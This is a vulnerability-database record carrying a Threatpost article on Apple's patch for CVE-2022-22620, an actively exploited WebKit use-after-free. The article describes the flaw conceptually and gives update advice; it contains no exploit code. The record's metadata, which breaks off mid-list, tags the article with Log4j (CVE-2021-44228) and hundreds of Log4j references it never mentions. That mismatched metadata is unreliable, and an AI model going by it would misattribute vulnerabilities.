DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Apple Patches Actively Exploited WebKit Zero Day", "description": "Apple has patched yet another zero-day vulnerability, this time in its WebKit browser engine, that threat actors already are actively exploiting to compromise iPhones, iPads and MacOS devices.\n\nThe zero-day, tracked as CVE-2022-22620, is a Use-After-Free issue, which is related to incorrect use of dynamic memory during program operation.\n\nIn the case of Apple\u2019s zero-day, threat actors can execute arbitrary code on affected devices after they process maliciously crafted web content, the company said in a [description of the bug](<https://support.apple.com/en-us/HT213092>). The flaw also can lead to unexpected OS crashes.\n\n\u201cApple is aware of a report that this issue may have been actively exploited,\u201d the company wrote in its update notes.\n\nThe simplest way threat actors can exploit the flaw involves the system\u2019s reuse of freed memory, according to the vulnerability\u2019s description on the Common Weakness Enumeration website. \u201cReferencing memory after it has been freed can cause a program to crash, use unexpected values or execute code,\u201d according to the [post](<https://cwe.mitre.org/data/definitions/416.html>).\n\nExploiting previously freed memory can have various adverse consequences, \u201cranging from the corruption of valid data to the execution of arbitrary code, depending on the instantiation and timing of the flaw,\u201d the description said.\n\n## **Memory Error**\n\nThese types of errors typically have two common and sometimes overlapping causes: error conditions and other exceptional circumstances, and confusion over which part of the program is responsible for freeing the memory, according to the post.\n\nIn the case of CVE-2022-22620, the memory in question is allocated to another pointer validly at some point after it has been freed. The original pointer to the freed memory is used again and points to somewhere within the new allocation.\n\n\u201cAs the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process,\u201d according to the post.\n\nIf the newly allocated data happens to hold a class \u2013 for example, in C++ code \u2013 various function pointers may be scattered within the heap data. \u201cIf one of these function pointers is overwritten with an address to valid shellcode, execution of arbitrary code can be achieved,\u201d Apple\u2019s post explained.\n\n## **Numerous Devices Affected**\n\nApple released separate security updates for its products to address the issue \u2013 [macOS Monterey 12.2.1](<https://support.apple.com/en-us/HT213092>), [iOS 15.3.1 and iPadOS 15.3.1](<https://support.apple.com/en-us/HT213093>). Both updates improve how the OSes manage memory.\n\nThe flaw affects numerous Apple devices, including iPhone 6s and later; all iPad Pro models, iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch 7th generation. It also affects desktops and notebooks running macOS Monterey.\n\nThe update is the second time this year that Apple has had to issue a patch for a zero day. [Last month](<https://threatpost.com/apple-zero-day-security-exploited/178040/>), the company also had to patch a memory issue \u2013 a zero-day flaw also affecting iOS, iPadOS and macOS Monterey tracked as [CVE-2022-22587](<https://packetstormsecurity.com/files/cve/CVE-2022-22587>). Attackers could exploit the bug using a malicious app to execute arbitrary code with kernel privileges.\n\nAt the same time, the company patched another WebKit zero-day tracked as [CVE-2022-22594](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22594>). The information-disclosure issue affects browsers for macOS, iOS and iPadOS and allows a snooping website to find out information about other tabs a user might have open.\n\nLast year Apple also patched several zero-day vulnerabilities, including [a zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) exploited by the NSO Group\u2019s Pegasus spyware and [a memory-corruption flaw](<https://threatpost.com/apple-patches-actively-exploited-zero-day-in-ios-macos/168177/>) in its iOS and macOS platforms that could allow for system takeover.\n\n## How to Force an Update if Necessary\n\nAs is typical for Apple, it didn\u2019t disclose many details of the vulnerability and won\u2019t until the investigation is completed. At any rate, \u201cthe majority of users have the patches installed,\u201d pointed out Kaspersky in an early morning Friday [post](<https://www.kaspersky.com/blog/webkit-vulnerability-cve-2022-22620/43650/>).\u201dSimply put, the most likely attack scenario is an infection of an iPhone or iPad device after visiting a malicious web page,\u201d noted the security firm\u2019s post.\n\nInstalling the OS 15.3.1 and iPadOS 15.3.1 updates will protect your device, though it does need to be connected to a Wi-Fi network in order to install the patch.\n\nFor devices that aren\u2019t yet showing that the update is ready to be installed, Kaspersky advised that systems can be forced into updating faster by going to system settings (Settings \u2192 General \u2192 Software update) and checking the availability of software updates.\n\n_021122 09:25 update: Added content from Kaspersky\u2019s post._\n\n_**Join Threatpost on **Wed. Feb 23 at 2 PM ET** for a **[LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)** \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. **[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)** and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion.**_\n", "published": "2022-02-11T13:45:45", "modified": "2022-02-11T13:45:45", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://threatpost.com/apple-patches-actively-exploited-webkit-zero-day/178370/", "reporter": "Elizabeth Montalbano", "references": ["https://support.apple.com/en-us/HT213092", "https://cwe.mitre.org/data/definitions/416.html", "https://support.apple.com/en-us/HT213092", "https://support.apple.com/en-us/HT213093", "https://threatpost.com/apple-zero-day-security-exploited/178040/", "https://packetstormsecurity.com/files/cve/CVE-2022-22587", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22594", "https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/", "https://threatpost.com/apple-patches-actively-exploited-zero-day-in-ios-macos/168177/", "https://www.kaspersky.com/blog/webkit-vulnerability-cve-2022-22620/43650/", "https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar", "https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar"], "cvelist": ["CVE-2021-44228", "CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620"], "immutableFields": [], "lastseen": "2022-02-11T17:01:28", "viewCount": 232, "enchantments": {"backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2022-1739"]}, {"type": "apple", "idList": ["APPLE:4A4048A18F34C672CBA0BD1BE526B92E", "APPLE:99DB3A974D6753D61A4B9F20ACDACD13", "APPLE:99E4CCCCE2782591968B06F1CD58BA2D", "APPLE:A9EDC29DCEC8CDEC250D783F058D98B8", "APPLE:EC977EE6AFB398593194B16BEAF964E4", "APPLE:F2C11F0D9C46752E77BED53DE4EE5912"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:F7DBB7CA-A582-4BC6-87C3-ACA4DBC4F58B"]}, {"type": "avleonov", "idList": ["AVLEONOV:89C75127789AC2C132A3AA403F035902"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0936"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-44228"]}, {"type": "debian", "idList": ["DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-44228"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392"]}, {"type": "fedora", "idList": ["FEDORA:59AA230A7074"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "github", "idList": ["GHSA-JFH8-C2JP-5V3Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "14482532-2406-58DF-89FF-30B085015257", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "70582B5B-E1E6-5767-94A6-39740A96A052", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4A33F39-BA6F-5AC0-B72C-30F0E4D6CD56", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B5D61CFC-8A10-5D92-B72B-D002C1D7AF33", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B8D5B910-B397-520E-9526-FE32D86E93D8", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D813949A-183D-55ED-AF64-B130B8F95A56", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DE88B6AE-5D54-5B49-A097-57038C720463", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E07C4625-66EE-5E09-880C-251E6273C21A", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", "E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA906824-9149-507D-893C-87A7FED8998B", "EB648301-A198-5E4A-A72E-9639ED09F6C9", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", "F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F523E799-3659-532F-8EED-40AD7F79E752", "F594470D-2599-5B2E-B317-C9720581C07D", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FD364396-D660-5D23-8323-23248A5108C5", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD"]}, {"type": "hackerone", "idList": ["H1:1423496", "H1:1427589", "H1:1438393"]}, {"type": "hivepro", "idList": ["HIVEPRO:205916945365E4C9EB9829951A82295A"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20211215-01-LOG4J"]}, {"type": "ibm", "idList": ["08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6", "11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B", "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "18578ECA481CB003C14A84CA7A47ACA060F579C24F4075A776AF26B575502960", "18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5", "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "1CF787D3495FD84D3FB0E74685765A4270075CE576D888A960036582B4F83133", "23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE", "2709A19D29B9047D230E570EBF5F26A53D322D557D88CBCFB480F1AFEEF6797C", "4204EAC341D63510AAFE13D5F22BA14E92396D43569176E371BFB452611D1A97", 